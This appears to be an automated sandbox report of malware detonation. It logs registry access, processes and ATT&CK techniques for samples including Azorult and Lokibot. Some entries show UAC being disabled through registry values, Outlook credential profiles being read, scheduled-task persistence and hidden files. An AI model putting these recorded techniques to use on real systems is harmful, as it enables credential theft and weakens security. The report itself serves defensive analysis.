Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Azorult.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wini.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ink.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rfusclient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe

Delays execution with timeout.exe 7 IoCs

evasion

pid	Process
5872	timeout.exe
5244	timeout.exe
5216	timeout.exe
6016	timeout.exe
5296	timeout.exe
5712	timeout.exe
5272	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
5168	ipconfig.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
5792	taskkill.exe
1364	taskkill.exe
3440	taskkill.exe
5268	taskkill.exe
5392	taskkill.exe

Modifies registry class 9 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3973800497-2716210218-310192997-1000\{292441A5-2418-40B4-AE42-9E0EC2FB9B44}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe

NTFS ADS 9 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 659052.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 851074.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe
File opened for modification	C:\Users\Admin\Downloads\The-MALWARE-Repo-master.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\fffc5da33ab43a787a1126db58901913b0019107c9bcaf4c7cd40a793787691d.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\bin.sh:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Lokibot.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 935807.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier	msedge.exe

Runs .reg file with regedit 2 IoCs

pid	Process
5768	regedit.exe
5832	regedit.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4884	schtasks.exe
1780	schtasks.exe
5792	schtasks.exe
4572	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4952	msedge.exe
4952	msedge.exe
2728	msedge.exe
2728	msedge.exe
1820	identity_helper.exe
1820	identity_helper.exe
1908	msedge.exe
1908	msedge.exe
4800	msedge.exe
4800	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
4064	msedge.exe
3076	msedge.exe
3076	msedge.exe
3580	msedge.exe
3580	msedge.exe
5760	msedge.exe
5760	msedge.exe
4480	msedge.exe
4480	msedge.exe
5288	Azorult.exe
5288	Azorult.exe
5288	Azorult.exe
5288	Azorult.exe
5288	Azorult.exe
5288	Azorult.exe
5288	Azorult.exe
5288	Azorult.exe
5288	Azorult.exe
5288	Azorult.exe
3204	Lokibot.exe
3204	Lokibot.exe
5540	rutserv.exe
5540	rutserv.exe
5540	rutserv.exe
5540	rutserv.exe
5540	rutserv.exe
5540	rutserv.exe
5968	rutserv.exe
5968	rutserv.exe
6048	rutserv.exe
6048	rutserv.exe
3076	rutserv.exe
3076	rutserv.exe
3076	rutserv.exe
3076	rutserv.exe
3076	rutserv.exe
3076	rutserv.exe
5092	rfusclient.exe
5092	rfusclient.exe
5732	winit.exe
5732	winit.exe
5732	winit.exe
5732	winit.exe
5732	winit.exe
5732	winit.exe
5732	winit.exe
5732	winit.exe
5732	winit.exe
5732	winit.exe
5732	winit.exe
5732	winit.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5276	taskhostw.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
684	Process not Found
684	Process not Found
684	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 58 IoCs

pid	Process
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
5608	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeRestorePrivilege	1388	7zG.exe
Token: 35	1388	7zG.exe
Token: SeSecurityPrivilege	1388	7zG.exe
Token: SeSecurityPrivilege	1388	7zG.exe
Token: SeDebugPrivilege	3204	Lokibot.exe
Token: SeDebugPrivilege	5540	rutserv.exe
Token: SeDebugPrivilege	6048	rutserv.exe
Token: SeTakeOwnershipPrivilege	3076	rutserv.exe
Token: SeTcbPrivilege	3076	rutserv.exe
Token: SeTcbPrivilege	3076	rutserv.exe
Token: SeDebugPrivilege	5392	taskkill.exe
Token: SeDebugPrivilege	5792	taskkill.exe
Token: SeDebugPrivilege	5240	powershell.exe
Token: SeDebugPrivilege	1364	taskkill.exe
Token: SeAuditPrivilege	5608	svchost.exe
Token: SeDebugPrivilege	5392	RDPWInst.exe
Token: SeAuditPrivilege	772	svchost.exe
Token: SeDebugPrivilege	3440	taskkill.exe
Token: SeDebugPrivilege	5268	taskkill.exe
Token: SeDebugPrivilege	5680	Lokibot.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
1388	7zG.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe
2728	msedge.exe

Suspicious use of SetWindowsHookEx 24 IoCs

pid	Process
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
5288	Azorult.exe
1364	wini.exe
5732	winit.exe
5540	rutserv.exe
5968	rutserv.exe
6048	rutserv.exe
3076	rutserv.exe
1352	cheat.exe
5740	taskhost.exe
668	P.exe
996	ink.exe
5372	R8.exe
5768	winlogon.exe
5276	taskhostw.exe
5956	winlogon.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2728 wrote to memory of 1056	2728	msedge.exe	81
PID 2728 wrote to memory of 1056	2728	msedge.exe	81
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 2136	2728	msedge.exe	82
PID 2728 wrote to memory of 4952	2728	msedge.exe	83
PID 2728 wrote to memory of 4952	2728	msedge.exe	83
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84
PID 2728 wrote to memory of 3208	2728	msedge.exe	84

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4616	attrib.exe
6004	attrib.exe
5900	attrib.exe
3212	attrib.exe
5708	attrib.exe
5568	attrib.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	Lokibot.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Lokibot.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Capture d'écran 2024-09-22 075118.png"
1⤵
PID:3448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffe9bb3cb8,0x7fffe9bb3cc8,0x7fffe9bb3cd8
  2⤵
  PID:1056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1908 /prefetch:2
  2⤵
  PID:2136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2508 /prefetch:8
  2⤵
  PID:3208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:2044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
  2⤵
  PID:4212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
  2⤵
  PID:3336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4540 /prefetch:1
  2⤵
  PID:4004
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
  2⤵
  PID:4560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
  2⤵
  PID:3116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
  2⤵
  PID:3500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
  2⤵
  PID:3024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
  2⤵
  PID:4544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5892 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
  2⤵
  PID:2420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:1
  2⤵
  PID:1472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6036 /prefetch:1
  2⤵
  PID:5012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
  2⤵
  PID:4744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6444 /prefetch:8
  2⤵
  - NTFS ADS
